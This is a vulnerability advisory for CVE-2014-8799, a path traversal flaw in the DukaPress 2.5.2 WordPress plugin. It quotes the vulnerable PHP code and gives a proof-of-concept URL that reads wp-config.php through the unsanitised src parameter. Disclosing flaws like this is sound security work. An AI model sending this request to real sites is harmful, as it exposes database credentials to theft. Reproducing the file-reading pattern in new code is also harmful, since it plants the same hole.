DukaPress 2.5.2 Path Traversal

Homepage:

https://wordpress.org/plugins/dukapress/

CVE-ID

CVE-2014-8799

CVSS Score

7.8

CVSS Vector

(AV:N/AC:L/Au:N/C:C/I:N/A:N)

Description:

File: dukapress\lib\dp_image.php

if (!function_exists('add_action')) {
    require_once('../../../../wp-load.php');
}

echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));

dp_img_resize returns given $img_url param if $width and $height (in our case $_REQUEST[‘w’] and $_REQUEST[‘h’]) doesn’t exist.

File: dukapress\php\dp-functions.php

function dp_img_resize($attach_id = null, $img_url = null, $width, $height, $crop = true){
	if($width && $height){
		// I skip unnecessary lines
		}
		return $image_src[0];
	}else{
		return $img_url;
	}	
}

So we can display any file passing only src parameter.

Proof of Concept:

http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php

Timeline: